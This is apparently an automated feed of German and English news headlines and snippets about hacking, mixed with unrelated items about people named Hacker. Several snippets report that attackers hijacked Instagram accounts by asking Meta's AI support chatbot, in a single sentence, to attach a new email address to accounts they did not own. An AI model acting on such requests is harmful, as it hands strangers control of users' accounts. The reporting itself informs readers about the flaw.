cert-in.org.inThe vulnerability described in this article was reported to NCIIPC via responsible disclosure in 2024 and has been confirmed as fixed. No payment was completed during testing. Screenshots have been redacted to remove the target domain.I Bought a ₹1,599 Government Book for ₹1. The Server Approved It. was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

“Bug Bounty Bootcamp #43: Login Page?

Thu, 04 Jun 2026 10:17:41 +0200

Let’s be real — you’ve hit that login wall more times than you’ve hit “snooze” on a Monday morning.Continue reading on InfoSec Write-ups »

29 Arrests, Nine Crime Groups Dismantled: Another Blow to Illegal Streaming

Thu, 04 Jun 2026 09:08:33 +0200

International Operation KRATOS led by Europol dismantled illegal streaming networks, leading to 29 arrests and nine crime groups taken down. An international law enforcement operation, codenamed Operation KRATOS and involving 13 countries (Belgium, Bulgaria, Croatia, France, Greece, Ireland, Italy, the Netherlands, Poland, Romania, Spain, the UK, and the US), spent seven months quietly dismantling the […]

Instagram-Konten über Metas KI-Chatbot gehackt? Eine einfache Anfrage reichte offenbar aus

Thu, 04 Jun 2026 01:39:57 +0200

BI konnte die Vorgehensweise der Hacker nicht unabhängig überprüfen. „Dieses Problem wurde behoben und wir sichern die betroffenen Konten“, schrieb ...

Infostealer-Welle: Hacker plündern 116.000 Systeme seit Januar - BornCity

Thu, 04 Jun 2026 07:28:30 +0200

Infostealer-Welle: Hacker plündern 116.000 Systeme seit Januar. Cyberkriminelle setzen zunehmend auf Infostealer, die Passwörter und Session-Tokens ...

Meta-KI verriet Passwörter an Hacker - INTENTURE NEWS

Thu, 04 Jun 2026 07:33:51 +0200

Ein Helferprogramm, das im Frühjahr für Supportanfragen freigeschaltet wurde, ließ sich mit einfachen Tricks dazu bewegen, fremde Instagram-Konten ...

KI-Cyberattacken: 67% der Hacker nutzen LLMs für Malware - BornCity

Thu, 04 Jun 2026 08:03:16 +0200

Neue Berichte zeigen, wie Hacker KI für automatisierte Angriffe einsetzen. Sicherheitsexperten und Technologieunternehmen haben am 3.

2026-06-03-Klinik Ottakring eröffnet top-moderne Einheit zur Lungendiagnostik

Wed, 03 Jun 2026 18:16:45 +0200

Gesundheitsstadtrat Peter Hacker, Ärztlicher Direktor Peter Gläser und Georg-Christian Funk, Vorstand der pneumologischen Abteilung, präsentieren ...

Kali365: Hacker umgehen 2FA in Microsoft-365-Umgebungen - BornCity

Thu, 04 Jun 2026 04:25:30 +0200

Hacker umgehen Zwei-Faktor-Authentifizierung mit immer raffinierteren Methoden. Besonders betroffen: Microsoft-365-Nutzer. Die Bedrohungslage in ...

Vom Tinder-Date zum Spontan-Segen: Wie "einfach heiraten" Paare verbindet | Sonntags

Thu, 04 Jun 2026 06:01:04 +0200

Anders bei Uschi und Peter Hacker: Sie sind seit 30 Jahren standesamtlich verheiratet. Durch die Aktion "einfach heiraten" wollen die beiden am 26.6.

Börsen-Hack: Hacker blieben 150 Tage unentdeckt im E-Mail-System - Börse Express

Thu, 04 Jun 2026 06:45:05 +0200

Hacker erbeuten über Monate E-Mails eines Top-Managers einer internationalen Börse. Sicherheitsforscher decken die ausgeklügelte Spionagekampagne ...

LLMShare-Angriffe: Hacker missbrauchen OpenAI für Malware - Ad-hoc-news.de

Thu, 04 Jun 2026 00:29:18 +0200

LLMShare-Angriffe: Hacker missbrauchen OpenAI für Malware. 04.06.2026 - 00:26:17 | boerse-global.de. Gefälschte Google-Anzeigen nutzen ChatGPT-Share- ...

How to use ChatGPT: A beginner's guide to mastering OpenAI's chatbot in 2026

Thu, 04 Jun 2026 00:51:00 +0200

Want to try ChatGPT? It's free and doesn't require an account. Here's how to get started quickly.

The Hacker und Rein: „We Come Alive“ als gemeinsame Single - VOLT Magazin

Wed, 03 Jun 2026 22:02:44 +0200

Wenn sich zwei Künstler zusammentun, die seit Jahren zu den markantesten Figuren ihrer Nischen zählen, kann das Ergebnis nur besonders sein.

Größte Cyberangriffe und Datenlecks 2026 - Zamin.uz

Wed, 03 Jun 2026 18:31:50 +0200

Betrachtet man den bisherigen Verlauf des Jahres 2026, scheinen Cybersicherheitsprobleme im Schatten globaler Kriege, der Klimakrise und neuer ...

LKA-Zugriff in Sinsheim-Rohrbach: Schlag gegen Cyberkriminalität - Jack News

Wed, 03 Jun 2026 18:33:14 +0200

Das Rätselraten um eine Festnahme auf der Rohrbacher Ortsdurchfahrt am Dienstagabend hat ein Ende. Weder der Raubüberfall auf den örtlichen ...

Instagram-Hack: KI-Bot ermöglichte Übernahme von Promis-Konten - Ad-hoc-news.de

Wed, 03 Jun 2026 21:15:12 +0200

Hacker nutzten Prompt-Injection im Meta-Support aus, um Profile wie das Weiße Haus zu übernehmen. Die Aktie fiel um fünf Prozent.

Instagram warnt Nutzer vor Angriffen über KI-Chatbot - Zamin.uz

Wed, 03 Jun 2026 18:35:16 +0200

Eine groß angelegte Hacking-Kampagne zum Diebstahl von Instagram-Konten unter Verwendung des Meta-KI-Chatbots dauert Berichten zufolge auch nach ...

Cyber espionage campaign targeted stock exchange executive’s Outlook account

Wed, 03 Jun 2026 20:13:17 +0200

Attackers spent five months silently stealing emails from a stock exchange executive’s Outlook account in a suspected espionage operation. A threat actor quietly sat inside a senior executive’s Outlook account at a major global stock exchange for roughly 150 days, from October 2025 to March 2026. Broadcom’s Symantec and Carbon Black threat-hunting team investigated the […]

Cybersecurity: KI-gesteuerte Angriffe umgehen Mehrfaktor-Authentifizierung - BornCity

Wed, 03 Jun 2026 18:12:45 +0200

Kriminelle nutzen KI und PhaaS-Tools, um MFA zu umgehen. Die Zahl der Angriffe steigt rasant, während neue EU-Regeln drohen.

Events im Sommer! - Tölzer Löwen

Wed, 03 Jun 2026 18:38:15 +0200

Am 25. Juli steigt ab 19 Uhr unsere legendäre Rooftop-Party auf der Dachterrasse der Hacker-Pschorr Arena! Zusammen mit DJ Fabi feiern wir mit ...

AI is causing cognitive fatigue. Here's how to work with more haste and less speed

Wed, 03 Jun 2026 20:02:48 +0200

Research suggests people are working harder and less smartly with AI, but there are ways to turn emerging tech into a valuable tool.

Erpresserischer Zugang zu Oregons Behördennetz: Hacker erhält 56 Monate Haft

Wed, 03 Jun 2026 18:01:00 +0200

Ein US-Gericht verurteilt Catalin Dragomir wegen illegalem Zugriffsverkauf auf ein Behördennetz in Oregon. Der Fall zeigt, wie Datenhandel und ...

How to try out over 85 Linux distros, no installation required - with DistroSea

Wed, 03 Jun 2026 19:04:15 +0200

This web-based Linux platform makes it easy to explore dozens of distributions, from the familiar to the obscure. It's free and works in any browser.

Digitale Ordnung: Hacker nutzten KI-Chatbots gegen Social-Media-Konten

Wed, 03 Jun 2026 17:37:20 +0200

Lena Gercke räumt beim Umzug Kindheitserinnerungen aus. Die emotionale Herausforderung und Tipps für Ordnung im Haushalt stehen im Fokus.

Instagram-Konten über Metas KI-Chatbot gehackt? Einfache Anfrage reichte offenbar aus

Wed, 03 Jun 2026 17:41:50 +0200

Instagram-Nutzer gaben an, dass ihre Konten am Wochenende gehackt worden seien. Der Angriff ging auf eine Schwachstelle bei Meta zurück.

Cybersicherheit spielerisch vermitteln - IHK-Magazin

Wed, 03 Jun 2026 17:56:20 +0200

Cybersicherheit neu gedacht: Das erste IHK-Gaminar zeigt, wie spielerische Formate Awareness und Sicherheitsbewusstsein stärken.

«Dümmste Sicherheitslücke»: Hacker kapern reihenweise Instagram-Konten mit einem Satz

Wed, 03 Jun 2026 09:28:33 +0200

Ein einziger Satz genügte. Hacker schrieben Metas KI-Support-Chatbot an und baten ihn, eine neue E-Mail-Adresse mit einem fremden Instagram-Konto ...

Gartner sieht Angreifer bei vier Bedrohungen klar im Vorteil - it-daily.net

Wed, 03 Jun 2026 13:43:13 +0200

Deepfakes, kompromittierte KI-Anwendungen, Prompt Injection und Angriffe auf die Software-Lieferkette: Bei diesen vier Bedrohungen haben es ...

White-Hat-Hacker erlangt 2 Mio. US-Dollar aus ICO-Fonds zurück – und zeigt, wie riskant ...

Wed, 03 Jun 2026 14:24:47 +0200

Für Unternehmen, die Krypto-Assets verwalten, rückt damit nicht nur die Wiederherstellung von Geldern, sondern auch die robuste Governance bei Token- ...

Fast 400 Autoren “geklaut”, “Nius”-Werbung, Investigativ wird riskanter - BILDblog

Wed, 03 Jun 2026 14:55:17 +0200

Matthias Meisner kritisiert die “Ostdeutsche Allgemeine Zeitung” (“OAZ”) von Verleger Holger Friedrich wegen einer offenbar falschen Autoren- und ...

Hacker-Angriff auf die Universität - SR.de

Wed, 03 Jun 2026 15:14:22 +0200

Die Polizei hat einen Hacker-Angriff auf die Universität des Saarlandes bestätigt. Nach Polizeiangaben erfolgte der Angriff am 24.April.

Bei Hackerangriff Daten von Studierenden der Saar-Uni geklaut - SR

Wed, 03 Jun 2026 15:39:04 +0200

Bei einem Cyberangriff hat sich ein Hacker Zugang zu Daten von Studierenden der Saar-Uni verschafft. Insgesamt sind mehr als 40.000 Profile auf ...

War es Hackern möglich, über Meta AI Instagram-Accounts zu kapern? - Mimikama

Wed, 03 Jun 2026 15:53:15 +0200

Ja, es war möglich, über Metas KI-Support Instagram-Konten zu kapern. Der Bot akzeptierte teils neue Mailadressen für fremde Accounts.

Über 2.000 infizierte Minecraft-Fans täglich: Wer diese kostenlosen Mods lädt, fängt sich Viren ein

Wed, 03 Jun 2026 16:10:17 +0200

Wer leidenschaftlich Minecraft zockt, sollte aktuell besonders vorsichtig sein. Unter anderem in gefälschten Videos bewerben Kriminelle Fake-Mods, ...

Data leak at «Schuelfoti»: Hackers threaten to publish children's photos - YouTube

Wed, 03 Jun 2026 13:36:31 +0200

Tausende sensible Kinderfotos und persönliche Daten von Schweizer Schülern wurden bei einem Hackerangriff auf eine deutsche Foto-Firma gestohlen.

Meta KI-Chatbot: Hacker übernahmen fremde Instagram-Konten über Support - T-Online

Wed, 03 Jun 2026 14:37:28 +0200

Angreifer haben mit Hilfe von Metas Chatbot fremde Instagram-Konten übernommen. Betroffen war auch ein altes Profil des Weißen Hauses.

Bunt und abwechslungsreich: Das ist beim Altstadtfest in Herzogenaurach geboten - NN.de

Wed, 03 Jun 2026 13:41:36 +0200

Herzogenaurach - Vereine, Musik und Familienangebote prägen das dreitägige Altstadtfest ab Samstag, 5. Juni, in Herzogenaurach.

Meta KI-Fehler: Hacker übernahmen 100 Instagram-Profile in zwei Tagen - BornCity

Wed, 03 Jun 2026 07:28:26 +0200

Ein Logikfehler im KI-Support-Assistenten von Meta erlaubte Hackern die Kontrolle über prominente Instagram-Profile zu erlangen.

Datenlecks: ShinyHunters veröffentlicht Millionen Kundendaten am 2. Juni - BornCity

Wed, 03 Jun 2026 08:58:42 +0200

Hacker veröffentlichen gestohlene Daten von Charter, Carnival und IIT Roorkee. Millionen Nutzer sind von den Leaks betroffen.

Hacker haben die künstliche Intelligenz von Instagram ausgetrickst, um Nutzerprofile zu übernehmen

Wed, 03 Jun 2026 09:37:37 +0200

Das soziale Netzwerk Instagram hat bekannt gegeben, dass es ein Sicherheitsproblem behoben hat, das es Hackern ermöglichte, sein Support-Tool mit ...

Recycling sollte inzwischen funktionieren. Warum es immer noch nicht klappt. - Quartz

Wed, 03 Jun 2026 09:53:03 +0200

Der Großteil des recycelbaren Materials verlässt niemals das Haus. Was gesammelt wird, ist mit Verunreinigungen konfrontiert, schwachen Märkten ...

Sapphire Sleet: Nordkoreas Hackergruppe zielt auf Krypto-Entwickler - BornCity

Wed, 03 Jun 2026 09:56:52 +0200

Eine großangelegte Angriffswelle der Gruppe Sapphire Sleet zielt auf Krypto-Wallets und sensible Zugangsdaten von Web3-Entwicklern.

POL-PDLU: Bekannte Betrugsmasche über WhatsApp - Presseportal

Wed, 03 Jun 2026 10:35:52 +0200

Polizeidirektion Ludwigshafen - Ludwigshafen - Am Dienstag, den 02.06.2026 erschien ein 28-Jähriger ...✚ Mehr lesen.

Angreifer warten nicht damit, Schwachstellen auszunutzen - it-daily.net

Wed, 03 Jun 2026 11:03:13 +0200

Zeit ist beim Patch-Management alles. Das Zeitfenster zwischen der Meldung einer Schwachstelle und dem Einsatz eines Softwareupdates ist ...

U.S. CISA adds Android and Linux Kernel flaws to its Known Exploited Vulnerabilities catalog

Wed, 03 Jun 2026 12:43:39 +0200

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Android and Linux Kernel flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Windows Shell and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the flaws added to the catalog: The first flaw added to the catalog, tracked […]

FPÖ - Schütz: Patientenanwalt bestätigt dramatisches Versagen von Hacker und Wiener ...

Wed, 03 Jun 2026 12:46:49 +0200

"Der aktuelle Bericht des Wiener Patientenanwalts ist eine vernichtende Bilanz für die Gesundheitspolitik von SPÖ-Gesundheitsstadtrat Peter Hacker ...